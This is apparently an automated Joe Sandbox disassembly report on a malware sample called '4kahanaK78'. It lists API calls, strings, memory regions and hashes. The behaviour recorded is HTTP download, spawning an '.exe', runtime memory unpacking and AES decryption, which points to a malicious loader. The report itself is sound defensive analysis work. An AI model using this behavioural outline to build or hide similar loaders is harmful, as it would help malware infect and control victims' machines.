                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                    • String ID: GET$http://
                                    • API String ID: 1233269984-1632879366
                                    • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                    • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                    • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                    • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                    Control-flow Graph

                                    APIs
                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD
                                      • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3
                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829
                                    Strings
                                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1
                                    • GET, xrefs: 00401F81
                                    • text, xrefs: 00401B5C
                                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
                                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB
                                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
                                    • API String ID: 2146599340-3782612381
                                    • Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                    • Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
                                    • Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                    • Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5

                                    Control-flow Graph

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B4024D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: cess$kernel32.dll
                                    • API String ID: 4275171209-1230238691
                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                    • Instruction ID: aaf139267ef4e5642fbb18c39f388347c894ce93ea4240f5c082b251081cc81f
                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                    • Instruction Fuzzy Hash: EB527974A01229DFDB64CF68C984BACBBB1BF49304F1480D9E94DAB351DB30AA85DF15

                                    Control-flow Graph

                                    APIs
                                    • GetTempPathA.KERNEL32(00000104,?,7F5C6DB0,?,?), ref: 004039AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: PathTemp
                                    • String ID: FOKD$]DFE
                                    • API String ID: 2920410445-3017404832
                                    • Opcode ID: 27236d4f250ac8372db859e863e52998a7c9ede129ab753eb113f8c947f5c1bf
                                    • Instruction ID: 060d57ff9f4645fb4c9d6c2d7fcf659463d82fb11908da3dea168b2ab6b676f4
                                    • Opcode Fuzzy Hash: 27236d4f250ac8372db859e863e52998a7c9ede129ab753eb113f8c947f5c1bf
                                    • Instruction Fuzzy Hash: F9324DB0D042588EEB24DF14CD4479EBBB5EB51308F1441E9D64C3B292DB796AC8CF99

                                    Control-flow Graph

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                    • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                    • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                    • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                    • String ID: text
                                    • API String ID: 1154000607-999008199
                                    • Opcode ID: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
                                    • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                    • Opcode Fuzzy Hash: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
                                    • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                      • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: .exe$open
                                    • API String ID: 1627157292-49952409
                                    • Opcode ID: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
                                    • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                    • Opcode Fuzzy Hash: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
                                    • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: http://
                                    • API String ID: 0-1121587658
                                    • Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                    • Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
                                    • Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                    • Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: SUB=
                                    • API String ID: 3472027048-145552029
                                    • Opcode ID: 215ed1e405e6368dfb5ba68c9b9ee9b1ec46e70625a89705628ba187409897b3
                                    • Instruction ID: 88daf57e9a9f6bf3b413cfac85103c48897bab337c773688da56e0d9a9d12cb3
                                    • Opcode Fuzzy Hash: 215ed1e405e6368dfb5ba68c9b9ee9b1ec46e70625a89705628ba187409897b3
                                    • Instruction Fuzzy Hash: AF0184F1D10248ABD710DFA9CD4ABDEBBB8EB14714F508139E924772C1D7785608CBA6
                                    APIs
                                    • SetErrorMode.KERNEL32(00000400,?,?,04B40223,?,?), ref: 04B40E19
                                    • SetErrorMode.KERNEL32(00000000,?,?,04B40223,?,?), ref: 04B40E1E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorMode
                                    • String ID:
                                    • API String ID: 2340568224-0
                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                    • Instruction ID: f91484002589e88e4a4d3f6ea8ab43fed4857b487d85ba7f5556b63228273427
                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                    • Instruction Fuzzy Hash: 0BD0123154512877D7003A94DC09BCD7B1CDF09B62F008451FB0DD9080C770964046E6
                                    APIs
                                    • VirtualProtect.KERNEL32(?,66705ADD,00000004,?), ref: 00A9FAB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 576726781f0fd2dd5e2b4b83f06ce4135b7ec36c81bc0fd8bdd748d64a912402
                                    • Instruction ID: c2e8d641b9485861ccb4d9618987ead3f95fb452efbc79d758d381a7881ca885
                                    • Opcode Fuzzy Hash: 576726781f0fd2dd5e2b4b83f06ce4135b7ec36c81bc0fd8bdd748d64a912402
                                    • Instruction Fuzzy Hash: C6F028FA308115AEEA00CE109E80ABF77E9D7813A0F309126F509C5D06C2744D559675
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                    • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                    • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                    • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                    • Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
                                    • Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                    • Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD
                                    APIs
                                    • VirtualProtect.KERNEL32(?,66705ADD,00000004,?), ref: 00A9FAB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 65a839782d0a3c0724fff41ea93222962d1751b8fa2253e2ac73be11a759d03c
                                    • Instruction ID: aa8ce762a7fa5568c301584bf7dd8eac8c71e679f6a3c771b793f7f523d4685d
                                    • Opcode Fuzzy Hash: 65a839782d0a3c0724fff41ea93222962d1751b8fa2253e2ac73be11a759d03c
                                    • Instruction Fuzzy Hash: 2EF05CB7208105AEDF009F60DA80AFF77A4DB41310F344126F409C6D0AC1348D129B69
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 11f86ca3a1d6c2ded55710e9fa41e81f9fa65614f7e1e7819daafebeb2ef39e8
                                    • Instruction ID: e3c2c0b78ca854e4d271c42c2b3d79b8bc02c0990e1cc97dbd1a0ca66efa9ead
                                    • Opcode Fuzzy Hash: 11f86ca3a1d6c2ded55710e9fa41e81f9fa65614f7e1e7819daafebeb2ef39e8
                                    • Instruction Fuzzy Hash: 44F0E5BA20520A9FCB009F20894069EB761FF45314F385165E45447E0AC331AC269BC5
                                    APIs
                                    • _free.LIBCMT ref: 10005C07
                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorFreeHeapLast_free
                                    • String ID:
                                    • API String ID: 1353095263-0
                                    • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                    • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                    • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                    • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                    APIs
                                    • _free.LIBCMT ref: 0040E27B
                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorFreeHeapLast_free
                                    • String ID:
                                    • API String ID: 1353095263-0
                                    • Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                    • Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
                                    • Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                    • Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680
                                    APIs
                                    • VirtualProtect.KERNEL32(?,66705ADD,00000004,?), ref: 00A9FAB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 13df1bb06a575fa7a725ef7417a1e16c84471aa900746d9d03f4d6d5b0d4d6f9
                                    • Instruction ID: 4559c0496328d75c9245cac291c15f9e7fff5c514c7ad33c7a4d35649763e278
                                    • Opcode Fuzzy Hash: 13df1bb06a575fa7a725ef7417a1e16c84471aa900746d9d03f4d6d5b0d4d6f9
                                    • Instruction Fuzzy Hash: 67C08C3A30824A6BDB009F24458036F3B219BC0600F7C8020AA080BE8EC6749C538B84
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00D894D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D89000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d89000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                    • Instruction ID: 9a5b3f9bc58d7feb4256cd89fc8baa81124e2b5f1b868f91978ac3b01c2ce790
                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                    • Instruction Fuzzy Hash: 18113F79A00208EFDB01DF98C985E99BBF5EF08350F098094F9489B361D375EA50DF90
                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                    • Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
                                    • Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                    • Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9
                                    APIs
                                    • VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                    • Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
                                    • Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                    • Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84
                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 04B437A7
                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B437CB
                                    • _mbstowcs.LIBCMT ref: 04B4381E
                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B43835
                                    • GetLastError.KERNEL32 ref: 04B4383F
                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B43867
                                    • GetLastError.KERNEL32 ref: 04B43871
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B43881
                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B43943
                                    • CryptDestroyKey.ADVAPI32(?), ref: 04B439B5
                                    Strings
                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B43783
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                    • API String ID: 3642901890-63410773
                                    • Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                    • Instruction ID: 4fe274e54d431eebfbc365bd5b69b411441be6651f31eb9a9068311ca2197b44
                                    • Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                    • Instruction Fuzzy Hash: F6818471B00218AFEF209F24CC45B9ABBB5FF89300F0481E5E94DE7290DB319A849F55
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE402D
                                    • __Init_thread_footer.LIBCMT ref: 04CE434B
                                    • __Init_thread_footer.LIBCMT ref: 04CE4C47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: DFEK$Q)9$rB$rB$rB$rB$rB
                                    • API String ID: 1385522511-4104243848
                                    • Opcode ID: ad6c51d0c23db519bf42d9139585622d1c3407f5fc4ce6c149f0e084eac9c7f9
                                    • Instruction ID: 1b1ff71d75617c38a21d7feca300b4e25a84579fffecd1471adf6667b41be81d
                                    • Opcode Fuzzy Hash: ad6c51d0c23db519bf42d9139585622d1c3407f5fc4ce6c149f0e084eac9c7f9
                                    • Instruction Fuzzy Hash: 38C2F470E00258DBEB28EF65DC447FDBB76AF04308F5481A8D4096B291DB74AF84DB95
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B44E94
                                    • Sleep.KERNEL32(00000BB8,00000000,?,04B4659E,0041B9C0,0042BA48,0042BA49), ref: 04B450BC
                                    • __Init_thread_footer.LIBCMT ref: 04B451B2
                                    • Sleep.KERNEL32(000007D0), ref: 04B4552A
                                    • Sleep.KERNEL32(000007D0), ref: 04B45544
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CriticalInit_thread_footerSection$EnterLeave
                                    • String ID: DFEK$updateSW$rB$rB
                                    • API String ID: 2213498749-3506205476
                                    • Opcode ID: fedcac95627ff82dc7824c58def76200c42a9a8a38efeeb3af7ee738ebcd6dfb
                                    • Instruction ID: 195c4b848b535703c47e7aa2a10455d41de4d29fa14b2bc4b342385004724538
                                    • Opcode Fuzzy Hash: fedcac95627ff82dc7824c58def76200c42a9a8a38efeeb3af7ee738ebcd6dfb
                                    • Instruction Fuzzy Hash: 4042F4B0A002649BEF34DF24CC487ADBBB1EF85308F1441E9D8096B291DB75AE84DF95
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 7>{f$7c7{$9yW]$:#$N){$b-F1$u[@>$v"Go$v2a$|[
                                    • API String ID: 0-346324137
                                    • Opcode ID: 30a028d36ec981f82d2ddd6a3ec2be7d54e32cf64f64d9265aa029cdf19dd5d9
                                    • Instruction ID: 0286c2ca2b09c395569eb9a1b5b603d4090339d17d674d31d92615c811e15dc9
                                    • Opcode Fuzzy Hash: 30a028d36ec981f82d2ddd6a3ec2be7d54e32cf64f64d9265aa029cdf19dd5d9
                                    • Instruction Fuzzy Hash: 92B228F360C2049FE3086E29EC8577ABBE9EF94320F16853DEAC5C7744EA3558058796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !w~;$"L?o$1? $7/m$?<o^$G~~l$b"7$mcU?
                                    • API String ID: 0-2181865516
                                    • Opcode ID: 5558245cd3e5cbfca98d65f10ce8c89e898c93a7f115d13f06da999400cc8e8d
                                    • Instruction ID: 34451f5e0596c2edc7e99ff7b603a4a555d561f05d0702519c1ff7c403b6a6f3
                                    • Opcode Fuzzy Hash: 5558245cd3e5cbfca98d65f10ce8c89e898c93a7f115d13f06da999400cc8e8d
                                    • Instruction Fuzzy Hash: 03B206F360C204AFE308AE2DEC8567ABBE5EF94320F16493DE6C5C3744E63598458697
                                    Strings
                                    Memory Dump Source
